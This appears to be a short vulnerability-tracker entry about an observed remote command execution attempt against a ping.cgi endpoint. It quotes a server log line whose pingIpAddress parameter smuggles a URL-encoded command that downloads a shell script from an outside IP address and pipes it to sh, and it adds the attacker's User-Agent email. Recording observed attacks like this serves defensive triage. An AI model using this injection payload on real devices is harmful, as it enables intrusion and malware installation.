GET /ping.cgi pingIpAddress Parameter Remote Command Execution #70
Description
briefdesign.ptr.network (91.92.40.237) - - [23/Nov/2025:15:07:19 -0700] "GET /ping.cgi?pingIpAddress=google.fr%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.enk.sh%7Csh%3B&sessionKey=1039230114 HTTP/1.0" 404 741 "http://91.92.40.237/pingview.cmd" "Mozilla/5.0 (rondo2012@atomicmail.io)"
We have 8 vulns with ping.cgi, but none with the parameter above. Likely been exploited a while as the email address in the User Agent has been discussed quite a bit. https://www.google.com/search?q=%22rondo2012%40atomicmail.io%22